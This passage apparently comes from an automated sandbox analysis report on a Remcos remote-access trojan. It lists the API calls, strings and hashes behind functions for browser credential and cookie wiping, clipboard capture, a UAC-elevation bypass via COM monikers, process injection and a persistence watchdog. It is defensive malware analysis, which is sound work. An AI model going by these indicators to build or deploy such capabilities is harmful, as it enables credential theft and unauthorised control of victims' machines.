  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
• WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
• Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
• TerminateProcess.KERNEL32(00000000), ref: 00405A17
• CloseHandle.KERNEL32 ref: 00405A23
• CloseHandle.KERNEL32 ref: 00405A2B
• CloseHandle.KERNEL32 ref: 00405A3D
• CloseHandle.KERNEL32 ref: 00405A45
Strings
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
• String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
• API String ID: 2994406822-18413064
• Opcode ID: 0c36db2859bd7c5efddd162eb7a9bd46f505a8fe816b69fdc27289b4be3fa82b
• Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
• Opcode Fuzzy Hash: 0c36db2859bd7c5efddd162eb7a9bd46f505a8fe816b69fdc27289b4be3fa82b
• Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
  • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
• OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
• CloseHandle.KERNEL32(00000000), ref: 00412155
• CreateThread.KERNEL32(00000000,00000000,Function_000127EE,00000000,00000000,00000000), ref: 004121AB
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
Strings
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CloseCreateOpen$HandleMutexProcessThreadValue
• String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
• API String ID: 261377708-13974260
• Opcode ID: 73754e599d1e361b2f2d4439a328938cb6c66d24b99e1d6933cb7347129df002
• Instruction ID: 5044532447ce4e70f722e285ad7bc5f912dfeea71c25201e33dbc8cc77036b6f
• Opcode Fuzzy Hash: 73754e599d1e361b2f2d4439a328938cb6c66d24b99e1d6933cb7347129df002
• Instruction Fuzzy Hash: 8171823160430167C618FB72CD579AE73A4AED0308F50057FF546A61E2FFBC9949C69A
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
• FindClose.KERNEL32(00000000), ref: 0040BBC9
• FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
• FindClose.KERNEL32(00000000), ref: 0040BD12
Strings
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
• API String ID: 1164774033-3681987949
• Opcode ID: 0727e96575f382ce024b770c9cf78de508cdcdbf02e88d565c43a0fb52ad4714
• Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
• Opcode Fuzzy Hash: 0727e96575f382ce024b770c9cf78de508cdcdbf02e88d565c43a0fb52ad4714
• Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenClipboard.USER32 ref: 004168C2
• EmptyClipboard.USER32 ref: 004168D0
• GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
• GlobalLock.KERNEL32(00000000), ref: 004168F9
• GlobalUnlock.KERNEL32(00000000), ref: 0041692F
• SetClipboardData.USER32(0000000D,00000000), ref: 00416938
• CloseClipboard.USER32 ref: 00416955
• OpenClipboard.USER32 ref: 0041695C
• GetClipboardData.USER32(0000000D), ref: 0041696C
• GlobalLock.KERNEL32(00000000), ref: 00416975
• GlobalUnlock.KERNEL32(00000000), ref: 0041697E
• CloseClipboard.USER32 ref: 00416984
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
• String ID: !D@
• API String ID: 3520204547-604454484
• Opcode ID: 6e793caff493ff3e52790fa1c77f2f07f3351176aacbb80bec49ed1ed1cde3b6
• Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
• Opcode Fuzzy Hash: 6e793caff493ff3e52790fa1c77f2f07f3351176aacbb80bec49ed1ed1cde3b6
• Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
• FindClose.KERNEL32(00000000), ref: 0040BDC9
• FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
• FindClose.KERNEL32(00000000), ref: 0040BEAF
• FindClose.KERNEL32(00000000), ref: 0040BED0
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Find$Close$File$FirstNext
• String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 3527384056-432212279
• Opcode ID: a832034822c3cb66eb5f8080b7cde16d67028b55a024d1e421a8b91fcbbd43ec
• Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
• Opcode Fuzzy Hash: a832034822c3cb66eb5f8080b7cde16d67028b55a024d1e421a8b91fcbbd43ec
• Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00413465
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 297527592-0
                                                                                                                                                                    • Opcode ID: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                                                                                                                                    • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                                                                                                                                                    • Opcode Fuzzy Hash: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                                                                                                                                    • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                                                                                                                                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                                                                                                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                                                                                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                                                                                                    • API String ID: 3756808967-1743721670
                                                                                                                                                                    • Opcode ID: a44d1c149e9206c8c5790be5d5281b0a3ac589c6ddaf07dd4e5038071b524407
                                                                                                                                                                    • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                                                                                                                                                    • Opcode Fuzzy Hash: a44d1c149e9206c8c5790be5d5281b0a3ac589c6ddaf07dd4e5038071b524407
                                                                                                                                                                    • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                                                                                                    • API String ID: 0-1861860590
                                                                                                                                                                    • Opcode ID: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                                                                                                                                    • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                                                                                                                                                    • Opcode Fuzzy Hash: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                                                                                                                                    • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _wcslen.LIBCMT ref: 00407521
                                                                                                                                                                    • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Object_wcslen
                                                                                                                                                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                                    • API String ID: 240030777-3166923314
                                                                                                                                                                    • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                                                                                                                                    • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                                                                                                                                                    • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                                                                                                                                    • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                                                                                                                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041A7BB
                                                                                                                                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3587775597-0
                                                                                                                                                                    • Opcode ID: c686599948fa5da1445dac0334782799476a653eb7c8e4d05ef1c0b84818098d
                                                                                                                                                                    • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                                                                                                                                                    • Opcode Fuzzy Hash: c686599948fa5da1445dac0334782799476a653eb7c8e4d05ef1c0b84818098d
                                                                                                                                                                    • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040C47D
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                    • API String ID: 1164774033-405221262
                                                                                                                                                                    • Opcode ID: 9baee15444d151661bac6597f15491a93abea62e6db9052377387430c257f9de
                                                                                                                                                                    • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                                                                                                                                                    • Opcode Fuzzy Hash: 9baee15444d151661bac6597f15491a93abea62e6db9052377387430c257f9de
                                                                                                                                                                    • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                                                                                                                                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2341273852-0
                                                                                                                                                                    • Opcode ID: a5eb3ddd6edf47b185b46ec297d14847becf751be7614732afc11e449a0b0cbf
                                                                                                                                                                    • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                                                                                                                                                    • Opcode Fuzzy Hash: a5eb3ddd6edf47b185b46ec297d14847becf751be7614732afc11e449a0b0cbf
                                                                                                                                                                    • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
• FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: File$Find$CreateFirstNext
• String ID: 8SG$PXG$PXG$NG$PG
• API String ID: 341183262-3812160132
• Opcode ID: 17e404fab42117a95efd329cb0ff4af70f016aee304aa76f89f91f03962f64ed
• Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
• Opcode Fuzzy Hash: 17e404fab42117a95efd329cb0ff4af70f016aee304aa76f89f91f03962f64ed
• Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
• GetProcAddress.KERNEL32(00000000), ref: 00414271
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: AddressCloseCreateLibraryLoadProcsend
• String ID: SHDeleteKeyW$Shlwapi.dll
• API String ID: 2127411465-314212984
• Opcode ID: b8be7d43ccea86f00341678901180a47eff9e8f17ad8a8565ee2a5e7b7fb4677
• Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
• Opcode Fuzzy Hash: b8be7d43ccea86f00341678901180a47eff9e8f17ad8a8565ee2a5e7b7fb4677
• Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
  • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
  • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
  • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
  • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
• ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
• LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
• GetProcAddress.KERNEL32(00000000), ref: 00416872
Strings
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
• String ID: !D@$PowrProf.dll$SetSuspendState
• API String ID: 1589313981-2876530381
• Opcode ID: 8ab362c5c31131a6b6b5401f7c459622763a6f826cc29e57ee0f5cd5f5ab97ee
• Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
• Opcode Fuzzy Hash: 8ab362c5c31131a6b6b5401f7c459622763a6f826cc29e57ee0f5cd5f5ab97ee
• Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
Uniqueness

Uniqueness Score: -1.00%

APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
• GetLastError.KERNEL32 ref: 0040BA58
Strings
• UserProfile, xrefs: 0040BA1E
• [Chrome StoredLogins not found], xrefs: 0040BA72
• \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
• [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
• API String ID: 2018770650-1062637481
• Opcode ID: c04ade68c18fbe0e569556c46b8928cb2529683c30f590f27aedceba8b26999c
• Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
• Opcode Fuzzy Hash: c04ade68c18fbe0e569556c46b8928cb2529683c30f590f27aedceba8b26999c
• Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
• OpenProcessToken.ADVAPI32(00000000), ref: 00417966
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
• GetLastError.KERNEL32 ref: 0041799D
Strings
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
